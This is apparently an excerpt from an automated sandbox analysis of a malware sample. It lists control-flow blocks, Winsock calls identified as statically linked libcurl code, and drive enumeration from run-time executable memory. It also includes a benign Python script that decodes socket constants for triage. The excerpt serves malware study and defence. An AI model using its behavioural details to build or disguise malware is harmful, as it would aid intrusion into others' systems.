                                                              • Opcode Fuzzy Hash: 5ee082dce2d826e56d65b69095f8cb5e70219e75796db0cdf4cbf783ffbea070
                                                              • Instruction Fuzzy Hash: 8171B3B49043199FDB00EF69D58479EBBF0FF85318F10886DE89897311E7749A888F92

Control-flow Graph (rendered graph not reproduced; basic blocks and edges recovered from the graph data)

• 1147: 969290-9692ed, call 9376a0 -> 1150, 1151
• 1150: 9693c3-9693ce -> 1160, 1161
• 1151: 9692f3-9692fb -> 1152, 1153
• 1152: 969301-969333, call 94d8c0, call 94d9a0 -> 1171, 1172
• 1153: 9693aa-9693af -> 1154, 1155
• 1154: 969456-969470 (no successors)
• 1155: 9693b5-9693bc -> 1158, 1159
• 1158: 9693be -> 1154
• 1159: 969429-969431 -> 1163, 1164
• 1160: 9693e5-969427, call 94d090, call 974f40 -> 1154, 1159
• 1161: 9693d0-9693e1 -> 1155, 1165
• 1163: 969433-969437 -> 1154, 1164
• 1164: 969439-96943f -> 1154, 1169
• 1165: 9693e3 -> 1154
• 1169: 969441-969453, call 9750a0 -> 1154
• 1171: 9693a7 -> 1153
• 1172: 969335-969364, WSAIoctl -> 1175, 1176
• 1175: 969366-96936f -> 1176, 1179
• 1176: 96939b-9693a4 -> 1171
• 1179: 969371-969390, setsockopt -> 1176, 1180
• 1180: 969392-969395 -> 1176

Shape: 1147 calls 9376a0 (the send wrapper listed next on this page); 1172 queries the socket with WSAIoctl and, on success, 1179 adjusts it with setsockopt; the remaining blocks handle the result and error paths and converge on 1154.

APIs
• WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0096935D
• setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00969389
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: 2ebfa9c5756c70d4387c67f4dc1d702c569e7c579db9c9cf8f4b2e4d74e1f2e9
                                                              • Instruction ID: fd1a37886021e8a1b628cb65e8519789b6cb509ccba24e35ed36a4c0d56a7851
                                                              • Opcode Fuzzy Hash: 2ebfa9c5756c70d4387c67f4dc1d702c569e7c579db9c9cf8f4b2e4d74e1f2e9
                                                              • Instruction Fuzzy Hash: 6B51E275604305AFE710DF24C881FAAB7A9FF88314F148529FD489B392EB31E991CB91
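The raw argument values in the APIs list above are enough to attribute this function. A WSAIoctl control code of 4004747B decodes, with the _IOR macro from winsock2.h, to SIO_IDEAL_SEND_BACKLOG_QUERY (mstcpip.h), and the setsockopt level/option pair 0000FFFF/00001001 is SOL_SOCKET/SO_SNDBUF. Together with the cf-socket.c strings this is consistent with libcurl's win_update_sndbuf_size() on its Windows send path, i.e. statically linked library code rather than logic specific to the sample. The decoder below is an added example written for this page; it is not Joe Sandbox output and not code from the sample. It assumes API lines are rendered exactly as above ("Api.Module(args), ref: ADDR") and uses only constant values taken from the Windows SDK headers; the two input lines are copied from the listing.

```python
"""Decode the Winsock constants in a Joe Sandbox "APIs" listing.

Added example (not Joe Sandbox output and not code from the sample): parses
API call lines in the report's rendered form and resolves the raw constants
so a triager can recognise library code. REPORT_LINES are copied from the
listing above; the line format and the constant tables are this example's
own assumptions, the values come from winsock2.h / mstcpip.h.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Winsock ioctl control-code layout (winsock2.h):
# bits 31..29 direction, bits 27..28 vendor flag, bits 16..22 parameter size,
# bits 8..15 the group character, bits 0..7 the command number.
IOC_VOID, IOC_OUT, IOC_IN = 0x20000000, 0x40000000, 0x80000000
IOC_VENDOR = 0x18000000
IOCPARM_MASK = 0x7F


def _ior(group: str, num: int, size: int) -> int:
    return IOC_OUT | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


def _iow(group: str, num: int, size: int) -> int:
    return IOC_IN | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


# Names rebuilt with the same macros the SDK headers use, so the table cannot
# drift from the decoding logic below.
KNOWN_IOCTLS: Dict[int, str] = {
    _ior("t", 123, 4): "SIO_IDEAL_SEND_BACKLOG_QUERY",  # mstcpip.h
    _iow("f", 126, 4): "FIONBIO",                        # winsock2.h
    _ior("f", 127, 4): "FIONREAD",
    _ior("s", 7, 4): "SIOCATMARK",
    IOC_IN | IOC_VENDOR | 4: "SIO_KEEPALIVE_VALS",       # _WSAIOW(IOC_VENDOR, 4)
}
SOCKOPT_LEVELS = {0xFFFF: "SOL_SOCKET", 6: "IPPROTO_TCP"}
SOCKOPT_NAMES = {
    "SOL_SOCKET": {0x0004: "SO_REUSEADDR", 0x0008: "SO_KEEPALIVE",
                   0x1001: "SO_SNDBUF", 0x1002: "SO_RCVBUF"},
    "IPPROTO_TCP": {0x0001: "TCP_NODELAY"},
}


def decode_ioctl(code: int) -> Dict[str, object]:
    """Split a WSAIoctl control code into its _IOR/_IOW fields and name it."""
    direction = {IOC_VOID: "IOC_VOID", IOC_OUT: "IOC_OUT", IOC_IN: "IOC_IN",
                 IOC_IN | IOC_OUT: "IOC_INOUT"}.get(code & 0xE0000000, "?")
    group = (code >> 8) & 0xFF
    return {
        "direction": direction,
        "vendor": (code & IOC_VENDOR) == IOC_VENDOR,   # _WSAIO* family
        "size": (code >> 16) & IOCPARM_MASK,
        "group": chr(group) if 0x20 <= group < 0x7F else "",
        "num": code & 0xFF,
        "name": KNOWN_IOCTLS.get(code, "unknown"),
    }


def decode_sockopt(level: int, optname: int) -> Tuple[str, str]:
    """Resolve a setsockopt (level, optname) pair to SDK names."""
    lvl = SOCKOPT_LEVELS.get(level, f"level_{level:#x}")
    return lvl, SOCKOPT_NAMES.get(lvl, {}).get(optname, f"opt_{optname:#x}")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[object]   # int for hex literals, None for '?', str otherwise
    ref: int


_LINE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\)\s*,\s*ref:\s*([0-9A-Fa-f]+)")


def _arg(tok: str) -> object:
    tok = tok.strip()
    if tok == "?":
        return None          # the sandbox could not resolve this argument
    try:
        return int(tok, 16)
    except ValueError:
        return tok           # a resolved string argument, e.g. "multi.c"


def parse_api_lines(lines: List[str]) -> List[ApiCall]:
    """Parse '• Api.Module(arg,arg,...), ref: ADDR' lines as rendered above."""
    calls = []
    for line in lines:
        m = _LINE.search(line)
        if m:
            api, module, raw_args, ref = m.groups()
            calls.append(ApiCall(api, module, [_arg(a) for a in raw_args.split(",")], int(ref, 16)))
    return calls


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Attach decoded constants to the Winsock calls in a listing."""
    out = []
    for c in parse_api_lines(lines):
        entry: Dict[str, object] = {"api": c.api, "ref": f"{c.ref:08X}"}
        if c.api == "WSAIoctl" and isinstance(c.args[1], int):
            entry["decoded"] = decode_ioctl(c.args[1])
        elif c.api == "setsockopt" and all(isinstance(a, int) for a in c.args[1:3]):
            entry["decoded"] = dict(zip(("level", "optname"), decode_sockopt(c.args[1], c.args[2])))
        out.append(entry)
    return out


# Constructed input: the two API lines from the listing above, verbatim.
REPORT_LINES = [
    "• WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0096935D",
    "• setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00969389",
]

if __name__ == "__main__":
    for entry in triage(REPORT_LINES):
        print(entry)
```

Building the name table from the same _IOR/_IOW macros the headers use, instead of pasting literal values, is deliberate: a typo in a literal would silently misattribute a call, while a wrong macro argument shows up as a decode mismatch. Unresolved arguments ('?') are kept as None so a missing socket handle is never mistaken for a constant.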

Control-flow Graph (rendered graph not reproduced; basic blocks and edges recovered from the graph data)

• 1181: 9376a0-9376be -> 1182, 1183
• 1182: 9376c0-9376c7 -> 1183, 1184
• 1183: 9376e6-9376f2, send -> 1185, 1186
• 1184: 9376c9-9376d1 -> 1187, 1188
• 1185: 9376f4-937709, call 9372a0 -> 1186
• 1186: 93775e-937762 (no successors)
• 1187: 9376d3-9376e4 -> 1185
• 1188: 93770b-937759, call 9372a0, call 93cb20, call cb8c50 -> 1186

Shape: a thin wrapper around send; 1183 performs the call, 1185 logs the result, and 1188 is the separate path taken when the "reached memlimit" condition in the strings below applies.

APIs
• send.WS2_32(multi.c,?,?,?,00933D4E,00000000,?,?,009407BF), ref: 009376EB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-3388739168
                                                              • Opcode ID: edda5ab396176a92e9cde56fe3b4ac1386bda9af97f97f0a16fd33a960081c02
                                                              • Instruction ID: 683649e59b347a06323a48c3ff1a1696972599aee74104e86cbef4e621800de6
                                                              • Opcode Fuzzy Hash: edda5ab396176a92e9cde56fe3b4ac1386bda9af97f97f0a16fd33a960081c02
                                                              • Instruction Fuzzy Hash: 60110DF591C348BFD530A755AD96E277B9CDBC1B6CF451D14F80863242D5519C048AB2

Control-flow Graph (rendered graph not reproduced; basic blocks and edges recovered from the graph data)

• 1200: 6d90245-6d904ae, GetLogicalDrives -> 1224
• 1224: 6d904be-6d907c7, call 6d90774 (no successors)

This code lives in the region at 06D90000, which the dump lists as not backed by a PE image, i.e. memory the sample made executable at run time.

APIs
• GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\$A:\
                                                              • API String ID: 999431828-695790028
                                                              • Opcode ID: 4e2b1c61c2bea46703f40c292aeecc21eae665347ec7a43b232ce56fba9e9fd5
                                                              • Instruction ID: e50afeceeac3aa524c6fe3d8aa1c78c8ff8b9327c7133b4d6505c2417fdda236
                                                              • Opcode Fuzzy Hash: 4e2b1c61c2bea46703f40c292aeecc21eae665347ec7a43b232ce56fba9e9fd5
                                                              • Instruction Fuzzy Hash: DA714CEB14C121BD7BC281953B54AFB6B7EE6D6730330842AF847D6902E2D48F4965B1

Control-flow Graph (rendered graph not reproduced; basic blocks and edges recovered from the graph data)

• 1256: 6d90284-6d9028e -> 1257, 1258
• 1257: 6d9029c-6d904ae, GetLogicalDrives -> 1278
• 1258: 6d90290-6d9029b -> 1257
• 1278: 6d904be-6d907c7, call 6d90774 (no successors)

This is an alternate entry at 6d90284 into the same code as the function at 6d90245 above: both end in the block at 6d904ae and continue into 6d904be-6d907c7, so the disassembler has split one routine into overlapping functions.
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "Q=R$A:\$A:\
                                                              • API String ID: 0-695790028
                                                              • Opcode ID: c94a9297ba43d5fd91b612b72822d2562d15528328754b8c5723a7488554ea96
                                                              • Instruction ID: 126b7a1ea8dcc8e44d602764420421b64d7c63e73608a0c6c0b1f3fefd453fa2
                                                              • Opcode Fuzzy Hash: c94a9297ba43d5fd91b612b72822d2562d15528328754b8c5723a7488554ea96
                                                              • Instruction Fuzzy Hash: DD717EEB14C121BD7BC281953B54AFB6B7EE7D6730330842AF847D1502E2D48F4965B1

Control-flow Graph (rendered graph not reproduced; basic blocks and edges recovered from the graph data)

• 1410: 6d902de-6d904ae, GetLogicalDrives -> 1428
• 1428: 6d904be-6d907c7, call 6d90774 (no successors)

Alternate entry at 6d902de into the same code as the function at 6d90245 above.

APIs
• GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\$A:\
                                                              • API String ID: 999431828-695790028
                                                              • Opcode ID: ba292d8d6f0c3383b371f0b383e89c0bdf447060bf9d4570fdbff4e2ea257925
                                                              • Instruction ID: 163c7721b3f26e55583cdaa9e7e8cd3d8e43524b547809e34b625918f38adbd7
                                                              • Opcode Fuzzy Hash: ba292d8d6f0c3383b371f0b383e89c0bdf447060bf9d4570fdbff4e2ea257925
                                                              • Instruction Fuzzy Hash: 16617EEB14C121BE7BC281957B54AFB6B7EE6D6730330842BF487D5902E2C48F4965B1

Control-flow Graph (rendered graph not reproduced; basic blocks and edges recovered from the graph data)

• 1460: 6d902fb-6d904ae, GetLogicalDrives -> 1476
• 1476: 6d904be-6d907c7, call 6d90774 (no successors)

Alternate entry at 6d902fb into the same code as the function at 6d90245 above.

APIs
• GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\$A:\
                                                              • API String ID: 999431828-695790028
                                                              • Opcode ID: 26609328baad0bf591583e59d2e84089d2b47967c30e0f69691c08a162816965
                                                              • Instruction ID: 5f3dc4a7f7bc0b766a27a01b4b969e1ca0f456ae8d53fdc5072e7c4a102aa171
                                                              • Opcode Fuzzy Hash: 26609328baad0bf591583e59d2e84089d2b47967c30e0f69691c08a162816965
                                                              • Instruction Fuzzy Hash: 68616EEB148121BE7BC291953B54AFB6B7EE6D6730330842AF487D1902E2D88F4965B1

Control-flow Graph (rendered graph not reproduced; basic blocks and edges recovered from the graph data)

• 1508: 6d90386-6d904ae, GetLogicalDrives -> 1521
• 1521: 6d904be-6d907c7, call 6d90774 (no successors)

Alternate entry at 6d90386 into the same code as the function at 6d90245 above.

APIs
• GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\$A:\
                                                              • API String ID: 999431828-695790028
                                                              • Opcode ID: f70d6875813cfacd2f25c7b36762c0ed933cd3ecee8bd8a5b7873165861de9db
                                                              • Instruction ID: edbe35ea24cc0cbecbeb7abd0a1a3dbd80f43d4da6ad473354a244f65afb4d15
                                                              • Opcode Fuzzy Hash: f70d6875813cfacd2f25c7b36762c0ed933cd3ecee8bd8a5b7873165861de9db
                                                              • Instruction Fuzzy Hash: AA5170EB148121BD7BC281953B54AFA6A7EE7DB630330842EF487D1902E2D48F4965B1

Control-flow Graph (rendered graph not reproduced; basic blocks and edges recovered from the graph data)

• 1572: 9375e0-9375ed -> 1573, 1574
• 1573: 937607-937629, socket -> 1576, 1577
• 1574: 9375ef-9375f6 -> 1573, 1575
• 1575: 9375f8-9375ff -> 1578, 1579
• 1576: 93762b-93763c, call 9372a0 -> 1577
• 1577: 93763f-937642 (no successors)
• 1578: 937643-937699, call 9372a0, call 93cb20, call cb8c50 (no successors)
• 1579: 937601-937602 -> 1573

Shape: a thin wrapper around socket, mirroring the send wrapper at 9376a0 above; 1573 performs the call, 1576 logs the result, and 1578 is the separate "reached memlimit" path named in the strings below.
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: bb96381d93d0b0687a7d939201b68fb6173dda529d6e4f4b0e7351403148efba
                                                              • Instruction ID: 4de27b37a226854d1ac64b339ba84f53b24cacb143a89e702990a41a7c4b6612
                                                              • Opcode Fuzzy Hash: bb96381d93d0b0687a7d939201b68fb6173dda529d6e4f4b0e7351403148efba
                                                              • Instruction Fuzzy Hash: 2A11CCF1A14241ABD6302B6D6C17F9B7F8CCFC1734F040810F404A22D2D2128C58C6E2
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\
                                                              • API String ID: 999431828-3097021601
                                                              • Opcode ID: fcd616567f0e45661da864c90d5c6a83e57ef1c45fbaa9040fb1797a26cbc7fb
                                                              • Instruction ID: 4c48680ed41c7f463dc3ba701f088c745c32c2b4051354c9f5a94dbcae5f0847
                                                              • Opcode Fuzzy Hash: fcd616567f0e45661da864c90d5c6a83e57ef1c45fbaa9040fb1797a26cbc7fb
                                                              • Instruction Fuzzy Hash: E65180EB148121BD7BC281953B54AFA6B7EE7DB730330843AF487D5902E2C88F4965B1
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\
                                                              • API String ID: 999431828-3097021601
                                                              • Opcode ID: 09495c1469079281d2146df8b7c7f7708f5b29546cbc4dbda4b170152b06b74f
                                                              • Instruction ID: 5ec03b31d27d7e6d56895f6271f213f9c4048c59bb2f2d592768a9d85ebdd269
                                                              • Opcode Fuzzy Hash: 09495c1469079281d2146df8b7c7f7708f5b29546cbc4dbda4b170152b06b74f
                                                              • Instruction Fuzzy Hash: 1451C3EB54C110BEBBC281957B54AFA6B7DE7DB330330846EF887D6502E2848E4995B1
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\
                                                              • API String ID: 999431828-3097021601
                                                              • Opcode ID: 5ec9b3d341a6b5fb0fef739953f250a33282555f93fd125516b304b8f37b16f3
                                                              • Instruction ID: c60c936530614160e81b408066f0d6cc96f881a02819c0216b8e82d66e1ae6a6
                                                              • Opcode Fuzzy Hash: 5ec9b3d341a6b5fb0fef739953f250a33282555f93fd125516b304b8f37b16f3
                                                              • Instruction Fuzzy Hash: 8A5180DB148121BD7BC281953B54AFA6A7EE7DB630330843EF487D5602E6C48F8965B1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: _open
                                                              • String ID: terminated$@
                                                              • API String ID: 4183159743-3016906910
                                                              • Opcode ID: 3b42a1b10a6a48b0b2cbb91a98e952607ef0dedf538cd03a41cd5ab82c1bf221
                                                              • Instruction ID: beccba003d5267b8c8fb70a9a1a677928479ef21a916bc07302affc58b19d1ad
                                                              • Opcode Fuzzy Hash: 3b42a1b10a6a48b0b2cbb91a98e952607ef0dedf538cd03a41cd5ab82c1bf221
                                                              • Instruction Fuzzy Hash: A9416CB49043058FDB00EF79C8446AEBBF4EB48314F148A2DE8A8D7290E734D949DF66
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 0096A1C6
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0096A23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 0096A1F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: 49b3714cf0e496e1c9f7edd2804d38bec550560b0d0e95d4352269df7eb95d39
                                                              • Instruction ID: 4bba6eb318b7800a1b44df567280e106c5527f24ce9cf2283494925e7b3d7e46
                                                              • Opcode Fuzzy Hash: 49b3714cf0e496e1c9f7edd2804d38bec550560b0d0e95d4352269df7eb95d39
                                                              • Instruction Fuzzy Hash: E9210C31948284AAF7229B18EC42FE773BCEFD1328F004654F99863151FB3259858BE2
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 0094D65B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: 793fba37587cbc65445533e71ab5f4c0486c1ac812daf200ca526485d76afe90
                                                              • Instruction ID: 1f5707ad9a71409424aed360c9f0e316d42b9c5b468070d9d1672324f3783e00
                                                              • Opcode Fuzzy Hash: 793fba37587cbc65445533e71ab5f4c0486c1ac812daf200ca526485d76afe90
                                                              • Instruction Fuzzy Hash: A501F7D4E4234107F7116B38AD1776A35949B91304F4A0478D988921D3F769CA4CC2B3
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 009FAB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 009FABE4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
